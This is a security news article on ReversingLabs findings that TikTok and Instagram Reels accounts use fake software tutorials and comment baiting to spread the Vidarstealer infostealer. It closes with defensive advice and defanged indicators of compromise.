TikTok and Instagram Reels Abused to Distribute Vidarstealer Malware
Cybercriminals are exploiting TikTok and Instagram Reels with fake software tutorials to trick users into downloading the Vidarstealer infostealer, targeting credentials and financial data.
Cybercriminals are increasingly leveraging short-form video platforms like TikTok and Instagram Reels as a new attack surface, employing deceptive fake software tutorials to distribute malware. These campaigns create polished, convincing videos that promise free access to popular premium software, subtly directing viewers toward malicious downloads. The effectiveness of this tactic stems from its ability to blend seamlessly with the vast amount of legitimate tech tips and how-to content found on these platforms. With thousands of views and likes, these videos often appear credible, lulling potential victims into a false sense of security.
Researchers at ReversingLabs identified two distinct campaign methods used in this threat, both designed to reach massive audiences by exploiting social media recommendation algorithms. The primary objective of both campaigns is to guide users to a third-party website hosting malicious software disguised as a free premium application. The malware in question is Vidarstealer, a well-known infostealer offered as a service, notorious for stealing login credentials, financial data, and session tokens from infected devices. An update last October enhanced Vidarstealer's evasiveness, making it harder to detect, while its accessible price point of around $300 continues to make it a favored tool for threat actors.
The first campaign utilizes accounts with usernames like "windows.tips" or "windows.insights," complete with a blue and white profile image mimicking the official Windows social media icon. These accounts post professional-looking tutorial videos featuring AI-generated voiceovers. The videos instruct users to execute a specific PowerShell command, purportedly to unlock Spotify Premium for free. In reality, this command silently downloads and runs a script from a remote address, ultimately delivering the Vidarstealer malware. The sophistication of these videos, many achieving over 100,000 views, thousands of saves, and shares, contributes significantly to their deceptive power.
The second campaign adopts a more casual approach. These accounts post short, engaging clips showcasing premium Spotify features while playing trending music, encouraging viewers to comment out of curiosity. Once engagement is established, the attacker replies with directions to malicious websites such as pluginchad[.]xyz or d4ug[.]site. These sites host fake software downloads, often hidden behind survey walls, to further obscure the malicious intent.
Social media platforms are struggling to effectively combat this evolving threat. ReversingLabs researchers reported malicious Instagram accounts as scams, only to have their reports rejected. Even when content is flagged, platform intervention is often slow, allowing considerable damage to be done before accounts are removed. Attackers further suppress community warnings by deleting critical comments and blocking users who attempt to alert others, making self-policing by users nearly impossible.
This dynamic places the burden of defense heavily on organizations and individual users. Practical defenses include regularly auditing installation permissions on work devices, as some promoted software is framed as professional tools. Phishing awareness training programs must be updated to explicitly cover social media as a primary attack vector, not just email. Users are encouraged to consistently report suspicious accounts, as higher report volumes can increase the likelihood of account removal and disrupt an attacker's momentum.
Indicators of Compromise (IoCs) include the SHA-256 hash 03bbc4fa1fd784276da135ab62fef85aaddea66e6eb176d7e59c3398f818b153 for build.exe (identified as Vidarstealer), malicious domains like pluginchad[.]xyz and d4ug[.]site, and various TikTok and Instagram account handles used in the campaigns.
This new analysis from ReversingLabs details two distinct campaigns leveraging TikTok and Instagram Reels. One campaign mimicked official Windows accounts with AI-generated voiceovers to push a PowerShell script that downloaded Vidar, while the second used less polished clips and comment baiting to direct users to survey-laden download sites. The report also notes that platform moderation efforts have been largely ineffective, with content moderation rejections and the ability for creators to delete critical comments.